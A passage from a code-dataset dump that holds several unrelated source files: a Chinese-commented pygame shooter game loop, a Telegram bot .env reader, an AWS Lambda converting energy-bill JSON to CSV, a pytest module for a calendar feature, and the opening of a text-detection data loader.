与单枪统一成一个列表,这样就能重复使用代码\n bullets = bullet2\n bullet_sound.play()\n # 检测到双枪变量为True后,调用reset方法使子弹的active为True\n bullets[bullet2_index].reset((me.rect.centerx - 33, me.rect.centery - 50))\n bullets[bullet2_index + 1].reset((me.rect.centerx + 30, me.rect.centery - 50))\n bullet2_index = (bullet2_index + 2) % BULLET2_NUM\n else:\n # 60帧里生成4子弹\n if not(delay % 10):\n # 与双枪统一成一个列表,这样就能重复使用代码\n bullets = bullet1\n bullet_sound.play()\n # 每过10帧重置一次子弹的位置,这样的话60帧里就能够画四个子弹了\n bullets[bullet1_index].reset(me.rect.midtop) # 传入自己飞机的中间位置,子弹就会随飞机移动\n bullet1_index = (bullet1_index + 1) % BULLET1_NUM\n\n # 绘制敌机前检查是否被子弹击中\n for b in bullets:\n if b.active:\n b.move()\n if is_double_bullet:\n screen.blit(b.image, b.rect)\n else:\n screen.blit(b.image, b.rect)\n # 子弹存活时检测是否与敌机碰撞 放入列表中\n enemy_hit = pygame.sprite.spritecollide(b, enemies, False, pygame.sprite.collide_mask)\n # 遍历这儿列表 如果有碰撞的对象,则将其active设置为False\n # 先判断一下是否有数据 有的话才遍历,这样节省资源\n if enemy_hit:\n # 子弹毁灭\n b.active = False\n # 敌机毁灭\n for e in enemy_hit:\n # 因为加入了中飞机大飞机的血量 所以这儿判断遍历出来的对象是否时大飞机 或 中飞机 是就在击中时减少一滴血\n if (e in mid_enemies) or (e in big_enemies):\n e.hit = True\n e.energy -= 1\n # 血量打为零后 设置飞机被击毁\n if e.energy == 0:\n e.active = False\n else:\n e.active = False\n\n\n # 首先绘制大飞机再绘制中 最后绘制小飞机,因为先绘制小,大会将其覆盖\n for each in big_enemies:\n # 检查是否时存活状态\n if each.active:\n # 遍历出每一个调用移动方法\n each.move()\n # 飞机被击中时的那会儿绘制特效图片 正常时绘制正常图片\n if each.hit:\n screen.blit(each.image_hit, each.rect)\n each.hit = False\n else:\n if switch_image:\n screen.blit(each.image1, each.rect)\n else:\n screen.blit(each.image2, each.rect)\n # 绘制完飞机之后绘制血量\n # 先绘制一个黑色的血槽底槽 绘制在飞机限定矩形的上方5个像素处\n pygame.draw.line(screen,(0,0,0),(each.rect.left,each.rect.top - 5),(each.rect.right, each.rect.top - 5),2)\n # 计算飞机剩余血量\n energy_remain = each.energy / enemy.BigEnemy.energy\n # 剩余血量小于20% 时绘制红色的血量\n if energy_remain > 0.2:\n energy_color = green\n else:\n energy_color = red\n # 将剩余血量绘制在黑色底槽上方\n # 剩余血量绘制开始的位置 (each.rect.left, each.rect.top - 5)\n # 剩余血量绘制结束的位置 (each.rect.left + each.rect.width * enemgy_remain)\n # 结束位置:将限定矩形的width分为20份(大飞机血量)\n pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5),(each.rect.left + each.rect.width * energy_remain, each.rect.top - 5))\n\n # 大飞机即将出现时播放音效 当下部等于50时播放,不能写为大于或者小于,因为写成这样的话会每一帧都播放一次,当毁灭后音效停止\n if each.rect.bottom == -50:\n enemy3_fly_sound.play(-1)\n if each.rect.top == height:\n enemy3_fly_sound.stop()\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset()\n if not(delay % 3):\n # 这儿加e3_destroy_index == 0 是因为主程序每循环一次,不加判断的话,就会再次播放音效详见下面的else\n if e3_destroy_index == 0:\n enemy3_down_sound.play()\n screen.blit(each.destroy_images[e3_destroy_index], each.rect)\n # 下面e3_destroy_index产生的有1,2,3,4,5,0,1,2.....\n e3_destroy_index = (e3_destroy_index + 1) % 6\n if e3_destroy_index == 0:\n enemy3_fly_sound.stop()\n score += 10000\n each.reset()\n\n for each in mid_enemies:\n if each.active:\n # 遍历出每一个调用移动方法\n each.move()\n # 子弹击中飞机时的那会儿绘制特效图片 正常时绘制正常图片\n if each.hit:\n screen.blit(each.image_hit, each.rect)\n each.hit = False\n else:\n screen.blit(each.image, each.rect)\n\n # 绘制完飞机之后绘制血量\n # 先绘制一个黑色的血槽底槽\n pygame.draw.line(screen, (0,0,0),(each.rect.left, each.rect.top - 5), (each.rect.right, each.rect.top - 5), 2)\n\n energy_remain = each.energy / enemy.MidEnemy.energy\n if energy_remain > 0.2:\n energy_color = green\n else:\n energy_color = red\n pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5), (each.rect.left + each.rect.width * energy_remain, each.rect.top - 5))\n\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset()\n if not(delay % 3):\n if e2_destroy_index == 0:\n enemy2_down_sound.play()\n screen.blit(each.destroy_images[e2_destroy_index], each.rect)\n # 下面e2_destroy_index产生的有1,2,3,4,5,0,1,2.....\n e2_destroy_index = (e2_destroy_index + 1) % 4\n if e2_destroy_index == 0:\n score += 5000\n each.reset()\n for each in small_enemies:\n if each.active:\n # 遍历出每一个调用移动方法\n each.move()\n screen.blit(each.image, each.rect)\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset() 99 96 93 90 86\n if not(delay % 3):\n if e1_destroy_index == 0:\n enemy1_down_sound.play()\n screen.blit(each.destroy_images[e1_destroy_index], each.rect)\n # 下面e1_destroy_index产生的有1,2,3,4,5,0,1,2.....\n e1_destroy_index = (e1_destroy_index + 1) % 4\n if e1_destroy_index == 0:\n score += 1000\n each.reset()\n\n # 在绘制我方飞机前检测是否被撞击\n # me与enemies列表中的精灵发生碰撞则返回enemies 中碰撞的精灵,我们用一个列表来接收\n # False 表示碰撞后删除对象,第四个参数表示指定检测碰撞的函数\n enemies_down = pygame.sprite.spritecollide(me, enemies, False, pygame.sprite.collide_mask)\n # 如果存在相撞的对象\n if enemies_down and not me.invincible:\n # 则自方遇难\n me.active = False\n # 则将所有的敌机状态改为遇难状态\n for e in enemies_down:\n e.active = False\n\n\n # 绘制我方飞机\n if me.active:\n if switch_image:\n screen.blit(me.image1, me.rect)\n else:\n screen.blit(me.image2, me.rect)\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset()\n if not(delay % 3):\n if me_destroy_index == 0:\n me_down_sound.play()\n screen.blit(each.destroy_images[me_destroy_index], each.rect)\n # 下面e3_destroy_index产生的有1,2,3,4,5,0,1,2.....\n me_destroy_index = (me_destroy_index + 1) % 4\n if me_destroy_index == 0:\n me.reset()\n life_num -= 1\n pygame.time.set_timer(Invincible_Event, 3 * 1000)\n print('凉了一次!')\n\n # 绘制炸弹在里面,这样暂停的时候我们就看不到全屏炸弹的数量\n screen.blit(bomb_image, bomb_rect)\n # 绘制炸弹个数\n bomb_text = bomd_font.render('X %s' % str(bomb_num), True, white)\n screen.blit(bomb_text, (bomb_rect.width + 20, height - bomb_rect.height))\n\n # 绘制我方飞机后绘制分数至窗口\n # pygame中操做的都是surface对象,string文本.render(字符串对象,是否开启抗锯齿,字体颜色,字体背景色) 能将字符串转化为surface对象\n score_text = score_font.render('Score: %s' % str(score), True, white)\n # 绘制分数至窗口\n screen.blit(score_text, (10, 5))\n # 将暂停继续的图片绘制出来\n screen.blit(paused_image, paused_rect)\n\n\n # 检测到我方飞机生命为0时\n if life_num:\n # 绘制我方飞机的生命数量\n for m in range(life_num):\n screen.blit(life_image, (width - life_image_rect.width * (m + 1) - 10, height - life_image_rect.height))\n # 绘制游戏结束画面 我放飞机生命用尽\n elif life_num == 0:\n # 停止音乐\n pygame.mixer.music.stop()\n # 停止音效\n pygame.mixer.stop()\n # 停止补给\n pygame.time.set_timer(Supply_EVENT, 0)\n # 读取历史最高得分 recorded是为了阻止重复打开和关闭文件\n if not recorded:\n recorded = True\n try:\n with open('record.txt', 'r') as f:\n pass\n #record_score = f.read()\n\n # 如果记录的文件被用户删除时触发这儿\n except FileNotFoundError:\n with open('record.txt', 'w') as f:\n f.write(str(score))\n finally:\n with open('record.txt', 'r') as f:\n record_score = f.read()\n # 如果这次得分高于历史得分\n if int(score) > int(record_score):\n with open('record.txt', 'w') as f:\n f.write(str(score))\n # 最后读取一次存在文件里的分数\n with open('record.txt', 'r') as f:\n best_score = f.read()\n '''\n with open('record.txt', 'r') as f:\n record_score = f.read()\n #如果这次得分高于历史得分\n if score > record_score:\n with open('record.txt', 'wr') as f:\n f.write(str(score))'''\n # 绘制结束画面\n record_score_text = score_font.render(\"Best: %d\" % int(best_score), True, white)\n screen.blit(record_score_text, (50, 50))\n\n # 本局游戏结束时的分数 上面显示文字 下面分数\n gameover_text1 = gameover_font.render(\"Your score\", True, white)\n gameover_text1_rect = gameover_text1.get_rect()\n gameover_text1_rect.left, gameover_text1_rect.top = (width - gameover_text1_rect.width) // 2, height // 3\n screen.blit(gameover_text1, gameover_text1_rect)\n # 本局游戏结束时的分数 下面显示分数 分数转化为str 类型\n gameover_text2 = gameover_font.render(str(score), True, white)\n gameover_text2_rect = gameover_text2.get_rect()\n gameover_text2_rect.left, gameover_text2_rect.top = (width - gameover_text2_rect.width) // 2,\\\n gameover_text1_rect.bottom + 10\n screen.blit(gameover_text2, gameover_text2_rect)\n\n # 绘制结束时的两个按钮 第一个\n again_rect.left, again_rect.top = (width - again_rect.width) // 2, gameover_text2_rect.bottom + 50 # 相对定位(相对本局结束分数的位置)\n screen.blit(again_image, again_rect)\n # 第二个\n gameover_rect.left, gameover_rect.top = (width - gameover_rect.width) // 2, again_rect.bottom + 10 # 相对上一个按钮的定位\n screen.blit(gameover_image, gameover_rect)\n\n # 游戏结束时检测用户鼠标是否点击了上面的按钮\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1 and again_rect.collidepoint(event.pos):\n main()\n if event.button == 1 and gameover_rect.collidepoint(event.pos):\n pygame.quit()\n sys.exit()\n\n\n\n # 减帧方法\n # 能被5整除时才切换变量的值,从而达到限制帧率 延迟切换飞机突突突图片的效果\n if not(delay % 5):\n switch_image = not switch_image\n # 每一帧减一,因为我们这儿是一秒六十帧,所以一秒减少60,\n # 那么一秒钟就有12 个数字能被5 整除,所以就达到了限制帧率的目的(12帧)\n delay -= 1\n if not delay:\n delay = 100\n\n\n # screen只是绘制至了内存中,需要pygame.display.flip() 到显示器\n pygame.display.flip()\n # 定义游戏帧率\n clock.tick(60)\nif __name__ == '__main__':\n try:\n main()\n except SystemExit:\n # 点击×退出的异常不用关心\n pass\n except:\n # 其它异常时打印出错误之处后退出pygame模块, 打印出来后停留: input()\n traceback.print_exc()\n pygame.quit()\n input()\n","repo_name":"BJL0603/Company_temp","sub_path":"Air_War/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30655,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12888562796","text":"\"\"\"\nModule for reading values from environment variables in .env files\nContains Environment class, which performs reading of values and env - object of Environment class\n\nExample:\n Import an instance of the class into the desired module:\n from tgbot.utils.environment import env\n\n Get the values from the environment variables:\n bot_token: str = env.get_token_or_exit()\n bot_admins: tuple[int, ...] = env.get_admin_ids_or_exit()\n\"\"\"\n\nfrom os import path\nfrom sys import exit as sys_exit\n\nfrom environs import Env, EnvError\n\nfrom tgbot.config import ENV_FILE\nfrom tgbot.utils.logger import logger\n\n\nclass Environment:\n \"\"\"Reads variables from the .env file\"\"\"\n\n def __init__(self, path_to_env_file: str) -> None:\n \"\"\"\n Initializing a class or terminating a program if no .env file is found\n\n :param path_to_env_file: path to .env file with environment variables\n :type path_to_env_file: str\n \"\"\"\n if not path.exists(path=path_to_env_file):\n logger.critical(\"The .env file was not found in the path %s\", path_to_env_file)\n sys_exit(1)\n self._env: Env = Env()\n self._env.read_env(path=path_to_env_file, recurse=False)\n\n def get_token_or_exit(self) -> str:\n \"\"\"\n Returns the bot token or terminates the program in case of an error\n\n :return: bot token\n :rtype: str\n \"\"\"\n try:\n return str(self._env.str(\"BOT_TOKEN\"))\n except EnvError as exc:\n logger.critical(\"BOT_TOKEN not found: %s\", repr(exc))\n sys_exit(repr(exc))\n\n def get_admin_ids(self) -> tuple[int, ...] | None:\n \"\"\"\n Returns administrator IDs or None if ADMINS is not set in the .env file\n\n :return: admin ids\n :rtype: tuple[int, ...] | None\n \"\"\"\n try:\n return tuple(map(int, self._env.list(\"ADMINS\")))\n except (EnvError, ValueError) as exc:\n logger.error(\"ADMINS ids not found: %s\", repr(exc))\n return None\n\n\nenv: Environment = Environment(path_to_env_file=ENV_FILE)\n","repo_name":"rin-gil/python-telegram-bot-template","sub_path":"src/tgbot/utils/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"33800832536","text":"import json\nimport os\nimport re\nfrom io import StringIO\nfrom urllib.parse import unquote_plus\nimport boto3\nimport pandas as pd\n\ns3 = boto3.resource('s3')\ncsvBuffer = StringIO()\n\noutputFolder = os.environ.get('OUTPUT_FOLDER')\nfailedFolder = os.environ.get('FAILED_FOLDER')\ntodoFolder = os.environ.get('TODO_FOLDER')\ncustomer01 = os.environ.get('CUSTOMER_01')\n\n\ndef Validate_elec(Datafile, bucket, customer):\n df1 = Datafile\n df2 = pd.DataFrame()\n\n df2['Code'] = df1['Nmi']\n df2['Invoice_Number'] = df1['InvoiceNumber']\n df2['Cost'] = df1['TotalChargeIncExtra']\n df2['Date'] = df1['EndDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n df2['Date_TaxPoint'] = df1['IssueDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n df2['Date_Previous'] = df1['StartDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n\n # Capturing VAT\n All_VAT_list = []\n VAT_list = []\n for index, row in df1.iterrows():\n for vatitem in range(len(row['ExtraCharges'])):\n VAT1 = row['ExtraCharges'][vatitem]\n if VAT1['Name'] == 'VAT':\n VAT_list.append(VAT1['Cost'])\n BillVAT = sum(VAT_list)\n All_VAT_list.append(BillVAT)\n df2['VAT'] = pd.DataFrame(All_VAT_list)\n\n # Capturing Standing Charges\n Standingcharge_list = []\n Standingchargerate_list = []\n substring = \"Standing Charge\"\n for index, row in df1.iterrows():\n stchrge1 = row['Periods']\n\n if len(stchrge1) > 0:\n for schargenum in range(len(stchrge1)):\n try:\n stchrgeX = stchrge1[schargenum]\n stcharge2 = stchrgeX['EnergyService']\n\n for stnum in range(len(stcharge2)):\n stchrge3 = stcharge2[stnum]\n fullstring = stchrge3['Comment']\n\n if (stchrge3['Name'] == 'Service') & (substring in fullstring):\n Standingcharge_list.append(stchrge3['Cost'])\n Standingchargerate_list.append(stchrge3['Price'])\n except:\n print('No Standing charges')\n try:\n df2['Standing_Charge'] = pd.DataFrame(Standingcharge_list)\n df2['Standing_Charge_Rate'] = pd.DataFrame(Standingchargerate_list)\n except:\n df2['Standing_Charge'] = ''\n df2['Standing_Charge_Rate'] = ''\n\n ###########################################################################\n # # capturing KVA charges\n ###########################################################################\n KVA_Cost_list = []\n KVA_costrate_list = []\n KVA_units = []\n\n for index, row in df1.iterrows():\n KVA1 = row['Periods']\n\n if len(KVA1) > 0:\n for kvaitem in range(len(KVA1)):\n try:\n KVAX = KVA1[kvaitem]\n KVA2 = KVAX['Capacities']\n\n for kvanum in range(len(KVA2)):\n KVA3 = KVA2[kvanum]\n if KVA3['Name'] == 'DUoS':\n KVA_Cost_list.append(KVA3['Cost'])\n KVA_units.append(KVA3['Quantity'])\n KVA_costrate_list.append(KVA3['Price'])\n except:\n print('No KVA charges')\n try:\n df2['kVA'] = pd.DataFrame(KVA_units)\n df2['kVA_Cost_Rate'] = pd.DataFrame(KVA_costrate_list)\n df2['kVA_Cost'] = pd.DataFrame(KVA_Cost_list)\n except:\n df2['kVA'] = ''\n df2['kVA_Cost_Rate'] = ''\n df2['kVA_Cost'] = ''\n\n ###########################################################################\n # Capturing Peak Previous and Current Meter Reads + Estimate\n ###########################################################################\n M1_Previousread_list = []\n M1_CurrentRead_list = []\n M1_CurrentDate_list = []\n M1_PreviousDate_list = []\n M1_CurrentReadType_list = []\n M2_Previousread_list = []\n M2_PreviousDate_list = []\n M2_CurrentRead_list = []\n M2_CurrentDate_list = []\n\n for index, row in df1.iterrows():\n Meters1 = row['Meters']\n meterno = len(Meters1)\n\n if meterno == 0:\n M1_Previousread_list.append('')\n M1_PreviousDate_list.append('')\n M1_CurrentRead_list.append('')\n M1_CurrentDate_list.append('')\n M1_CurrentReadType_list.append('A')\n M2_Previousread_list.append('')\n M2_PreviousDate_list.append('')\n M2_CurrentRead_list.append('')\n M2_CurrentDate_list.append('')\n elif meterno == 1:\n M1_Previousread_list.append(Meters1[0]['PreviousRead'])\n M1_CurrentRead_list.append(Meters1[0]['CurrentRead'])\n M1_CurrentDate_list.append(Meters1[0]['CurrentReadDate'])\n if Meters1[0]['CurrentReadType'] == 'Actual':\n M1_CurrentReadType_list.append('A')\n elif Meters1[0]['CurrentReadType'] == 'Estimated':\n M1_CurrentReadType_list.append('E')\n else:\n M1_CurrentReadType_list.append('A')\n\n M2_Previousread_list.append('')\n M2_PreviousDate_list.append('')\n M2_CurrentRead_list.append('')\n M2_CurrentDate_list.append('')\n\n elif meterno == 2:\n M1_Previousread_list.append(Meters1[0]['PreviousRead'])\n M1_CurrentRead_list.append(Meters1[0]['CurrentRead'])\n M1_CurrentDate_list.append(Meters1[0]['CurrentReadDate'])\n if Meters1[0]['CurrentReadType'] == 'Actual':\n M1_CurrentReadType_list.append('A')\n elif Meters1[0]['CurrentReadType'] == 'Estimated':\n M1_CurrentReadType_list.append('E')\n else:\n M1_CurrentReadType_list.append('A')\n\n M2_Previousread_list.append(Meters1[1]['PreviousRead'])\n M2_PreviousDate_list.append(Meters1[1]['PreviousReadDate'])\n M2_CurrentRead_list.append(Meters1[1]['CurrentRead'])\n M2_CurrentDate_list.append(Meters1[1]['CurrentReadDate'])\n\n df2['M1_Present'] = pd.DataFrame(M1_CurrentRead_list)\n df2['M1_Previous'] = pd.DataFrame(M1_Previousread_list)\n df2['M1_Read_Date'] = pd.DataFrame(M1_CurrentDate_list)\n df2['Estimate'] = pd.DataFrame(M1_CurrentReadType_list)\n df2['M2_Present'] = pd.DataFrame(M2_CurrentRead_list)\n df2['M2_Previous'] = pd.DataFrame(M2_Previousread_list)\n df2['M2_Read_Date'] = pd.DataFrame(M2_CurrentDate_list)\n\n ###########################################################################\n # Capturing Peak charges\n ###########################################################################\n PeakChg_list = []\n PeakQty_list = []\n PeakRate_list = []\n OffPeakChg_list = []\n OffPeakQty_list = []\n OffPeakRate_list = []\n\n for index, row in df1.iterrows():\n peak1 = row['Periods']\n\n if len(peak1) > 0:\n for energyitem in range(len(peak1)):\n try:\n peakx = peak1[energyitem]\n peak2 = peakx['EnergyLineItems']\n\n for finalpeak in range(len(peak2)):\n peak3 = peak2[finalpeak]\n if (peak3['Name'] == 'Peak') | (peak3['Name'] == 'Energy'):\n PeakChg_list.append(peak3['Cost'])\n PeakQty_list.append(peak3['Quantity'])\n PeakRate_list.append(peak3['Price'])\n elif peak3['Name'] == 'OffPeak':\n OffPeakChg_list.append(peak3['Cost'])\n OffPeakQty_list.append(peak3['Quantity'])\n OffPeakRate_list.append(peak3['Price'])\n except:\n print(\"No energy items\")\n try:\n df2['M1_Units'] = pd.DataFrame(PeakQty_list)\n df2['M1_Cost_Rate'] = pd.DataFrame(PeakRate_list)\n df2['M1_Cost'] = pd.DataFrame(PeakChg_list)\n except:\n df2['M1_Units'] = ''\n df2['M1_Cost_Rate'] = ''\n df2['M1_Cost'] = ''\n try:\n df2['M2_Units'] = pd.DataFrame(OffPeakQty_list)\n df2['M2_Cost_Rate'] = pd.DataFrame(PeakRate_list)\n df2['M2_Cost'] = pd.DataFrame(OffPeakChg_list)\n except:\n df2['M2_Units'] = ''\n df2['M2_Cost_Rate'] = ''\n df2['M2_Cost'] = ''\n\n ############################################################################\n\n finaldf = df2[\n ['Code', 'Date', 'Invoice_Number', 'Date_TaxPoint', 'Date_Previous', 'M1_Units', 'M1_Cost_Rate', 'M1_Cost',\n 'M2_Units', 'M2_Cost_Rate', 'M2_Cost', 'Standing_Charge', 'Standing_Charge_Rate', 'kVA', 'kVA_Cost',\n 'kVA_Cost_Rate', 'VAT', 'Cost', 'Estimate', 'M1_Present', 'M1_Previous', 'M2_Present',\n 'M2_Previous', 'M1_Read_Date', 'M2_Read_Date']]\n\n # Writing into a file\n address = re.sub('\\W+', '', df1['Address'].iloc[0])\n File_invoicenumber = re.sub('\\W+', '', df1['InvoiceNumber'].iloc[0])\n filename = address[0:21] + \"-\" + str(df1['Nmi'].iloc[0]) + \"-\" + str(File_invoicenumber)\n finaldf.to_csv(csvBuffer)\n s3.Object(bucket, customer + '/' + outputFolder + '/' + filename + \".csv\").put(Body=csvBuffer.getvalue())\n\n\ndef Validate_gas(Datafile, bucket, customer):\n dfgas1 = Datafile\n dfgas2 = pd.DataFrame()\n\n dfgas2['Code'] = dfgas1['Nmi']\n dfgas2['Invoice_Number'] = dfgas1['InvoiceNumber']\n dfgas2['Cost'] = dfgas1['TotalChargeIncExtra']\n dfgas2['Date'] = dfgas1['EndDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n dfgas2['Date_TaxPoint'] = dfgas1['IssueDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n dfgas2['Date_Previous'] = dfgas1['StartDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n\n #################################################################################\n # Capturing VAT - GAS\n #################################################################################\n All_VAT_list = []\n VAT_list = []\n for index, row in dfgas1.iterrows():\n for vatitem in range(len(row['ExtraCharges'])):\n VAT1 = row['ExtraCharges'][vatitem]\n if (VAT1['Name'] == 'VAT'):\n VAT_list.append(VAT1['Cost'])\n BillVAT = sum(VAT_list)\n All_VAT_list.append(BillVAT)\n dfgas2['VAT'] = pd.DataFrame(All_VAT_list)\n\n #################################################################################\n # Capturing standing charge\n #################################################################################\n\n Standingcharge_list = []\n Standingchargerate_list = []\n substring = \"Standing Charge\"\n for index, row in dfgas1.iterrows():\n stchrge1 = row['Periods']\n\n if len(stchrge1) > 0:\n for schargenum in range(len(stchrge1)):\n try:\n stchrgeX = stchrge1[schargenum]\n stcharge2 = stchrgeX['EnergyService']\n\n for stnum in range(len(stcharge2)):\n stchrge3 = stcharge2[stnum]\n fullstring = stchrge3['Comment']\n\n if ((stchrge3['Name'] == 'Service') & (substring in fullstring)):\n Standingcharge_list.append(stchrge3['Cost'])\n Standingchargerate_list.append(stchrge3['Price'])\n except:\n print('No Standing charges')\n try:\n dfgas2['Standing_Charge'] = pd.DataFrame(Standingcharge_list)\n dfgas2['Standing_Charge_Rate'] = pd.DataFrame(Standingchargerate_list)\n except:\n dfgas2['Standing_Charge'] = ''\n dfgas2['Standing_Charge_Rate'] = ''\n\n #################################################################################\n # Capturing Peak Previous and Current Meter Reads + Estimate\n #################################################################################\n M1_Previousread_list = []\n M1_CurrentRead_list = []\n M1_CurrentDate_list = []\n M1_PreviousDate_list = []\n M1_CurrentReadType_list = []\n M1_CorrFact_list = []\n M1_CalVal_list = []\n\n for index, row in dfgas1.iterrows():\n Meters1 = row['Meters']\n meterno = len(Meters1)\n\n if meterno == 0:\n M1_Previousread_list.append('')\n M1_PreviousDate_list.append('')\n M1_CurrentRead_list.append('')\n M1_CurrentDate_list.append('')\n M1_CurrentReadType_list.append('A')\n\n elif meterno == 1:\n M1_Previousread_list.append(Meters1[0]['PreviousRead'])\n M1_CurrentRead_list.append(Meters1[0]['CurrentRead'])\n M1_CurrentDate_list.append(Meters1[0]['CurrentReadDate'])\n M1_CorrFact_list.append(Meters1[0]['CorrectionFactor'])\n M1_CalVal_list.append(Meters1[0]['CalorificValue'])\n\n if Meters1[0]['CurrentReadType'] == 'Actual':\n M1_CurrentReadType_list.append('A')\n elif Meters1[0]['CurrentReadType'] == 'Estimated':\n M1_CurrentReadType_list.append('E')\n else:\n M1_CurrentReadType_list.append('A')\n\n dfgas2['M1_Present'] = pd.DataFrame(M1_CurrentRead_list)\n dfgas2['M1_Previous'] = pd.DataFrame(M1_Previousread_list)\n dfgas2['M1_Read_Date'] = pd.DataFrame(M1_CurrentDate_list)\n dfgas2['Estimate'] = pd.DataFrame(M1_CurrentReadType_list)\n dfgas2['M1_Factor_1'] = pd.DataFrame(M1_CorrFact_list)\n dfgas2['M1_Factor_2'] = pd.DataFrame(M1_CalVal_list)\n\n #################################################################################\n # Capturing Gas units and charges\n #################################################################################\n\n All_units_list = []\n All_charges_list = []\n Gas_costrate = []\n Gas_units_list = []\n Gas_charges_list = []\n\n for index, row in dfgas1.iterrows():\n energycharges1 = row['Periods']\n\n if len(energycharges1) > 0:\n for echargenum in range(len(energycharges1)):\n echargeX = energycharges1[echargenum]\n echarge2 = echargeX['EnergyLineItems']\n\n for enum1 in range(len(echarge2)):\n echarge3 = echarge2[enum1]\n\n if echarge3['Name'] == 'Energy':\n Gas_units_list.append(echarge3['Quantity'])\n Gas_charges_list.append(echarge3['Cost'])\n gascostrate = echarge3['Price']\n\n All_units_list.append(sum(Gas_units_list))\n All_charges_list.append(sum(Gas_charges_list))\n Gas_costrate.append(gascostrate)\n\n dfgas2['M1_Units'] = pd.DataFrame(All_units_list)\n dfgas2['M1_Cost'] = pd.DataFrame(All_charges_list)\n dfgas2['M1_Cost_Rate'] = pd.DataFrame(Gas_costrate)\n\n ###################################################################################\n\n dfgas2['kWh_Factor'] = 3.6\n\n finaldf = dfgas2[['Code', 'Date', 'Invoice_Number', 'Date_TaxPoint', 'Date_Previous', 'M1_Units',\n 'M1_Cost_Rate', 'M1_Cost', 'Standing_Charge', 'Standing_Charge_Rate', 'VAT', 'Cost',\n 'Estimate', 'M1_Present', 'M1_Previous', 'M1_Factor_1', 'M1_Factor_2', 'kWh_Factor',\n 'M1_Read_Date']]\n\n # Writing into a file\n address = re.sub('\\W+', '', dfgas1['Address'].iloc[0])\n File_invoicenumber = re.sub('\\W+', '', dfgas1['InvoiceNumber'].iloc[0])\n filename = address[0:21] + \"-\" + str(dfgas1['Nmi'].iloc[0]) + \"-\" + str(File_invoicenumber)\n finaldf.to_csv(csvBuffer)\n s3.Object(bucket, customer + '/' + outputFolder + '/' + filename + \".csv\").put(Body=csvBuffer.getvalue())\n\n\ndef lambda_handler(event, context):\n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = unquote_plus(record['s3']['object']['key'])\n customer = key.split(\"/\")[0]\n folder = key.split(\"/\")[1]\n content_object = s3.Object(bucket, key)\n\n if folder == todoFolder and customer == customer01:\n try:\n file_content = content_object.get()['Body'].read().decode('utf-8')\n Jsondata = json.loads(file_content)\n Datafile = pd.DataFrame(Jsondata)\n Commodity_value = Datafile['Commodity'].iloc[0]\n print(Commodity_value)\n if Commodity_value == 0:\n Validate_elec(Datafile, bucket, customer)\n if Commodity_value == 1:\n Validate_gas(Datafile, bucket, customer)\n s3.Object(bucket, customer + '/' + outputFolder + '/' + key.split(\"/\")[2]).put(\n Body=content_object.get()['Body'].read())\n s3.Object(bucket, key).delete()\n except:\n s3.Object(bucket, customer + '/' + failedFolder + '/' + key.split(\"/\")[2]).put(\n Body=content_object.get()['Body'].read())\n s3.Object(bucket, key).delete()\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Hello from Lambda!')\n }\n","repo_name":"bimalkeeth/convertor","sub_path":"convertor_lambda/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74208857379","text":"import datetime\n\nimport pytest\n\nfrom app.internal.celebrity import get_today_month_and_day\n\nCELEBRITY_ROUTE = \"/celebrity\"\nFAKE_TIME = datetime.date(2018, 9, 18)\n\nBAD_DATES = [\n datetime.date(2021, 1, 1),\n datetime.date(1789, 7, 14),\n datetime.date(1776, 7, 4),\n datetime.date(1945, 1, 27),\n datetime.date(2000, 10, 16),\n]\n\nGOOD_DATES = [\n datetime.date(2020, 9, 18),\n datetime.date(2019, 9, 18),\n datetime.date(2016, 9, 18),\n]\n\n\n@pytest.fixture\ndef datetime_mock(monkeypatch):\n class MockDateTime:\n\n @staticmethod\n def today():\n return FAKE_TIME\n\n monkeypatch.setattr(datetime, 'date', MockDateTime)\n\n\n@pytest.mark.parametrize('date', BAD_DATES)\ndef test_get_today_month_and_day_bad(date, datetime_mock):\n assert get_today_month_and_day() != date.strftime(\"%m-%d\")\n\n\n@pytest.mark.parametrize('date', GOOD_DATES)\ndef test_get_today_month_and_day_good(date, datetime_mock):\n assert get_today_month_and_day() == date.strftime(\"%m-%d\")\n\n\ndef test_celebrity_page_exists(client):\n response = client.get(CELEBRITY_ROUTE)\n assert response.ok\n assert b'born today' in response.content\n","repo_name":"PythonFreeCourse/calendar","sub_path":"tests/test_celebrity.py","file_name":"test_celebrity.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"35"} +{"seq_id":"25913817095","text":"import math\nimport random\nimport string\n\nimport cv2\nimport mmcv\nimport numpy as np\nimport Polygon as plg\nimport pyclipper\nimport scipy.io as scio\nimport torch\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom torch.utils import data\n\nfrom .coco_text import COCO_Text\n\nEPS = 1e-6\nsynth_root_dir = './data/SynthText/'\nsynth_train_data_dir = synth_root_dir\nsynth_train_gt_path = synth_root_dir + 'gt.mat'\n\nic17_root_dir = './data/ICDAR2017MLT/'\nic17_train_data_dir = ic17_root_dir + 'ch8_training_images/'\nic17_train_gt_dir = ic17_root_dir + \\\n 'ch8_training_localization_transcription_gt_v2/'\n\nct_root_dir = './data/COCO-Text/'\nct_train_data_dir = 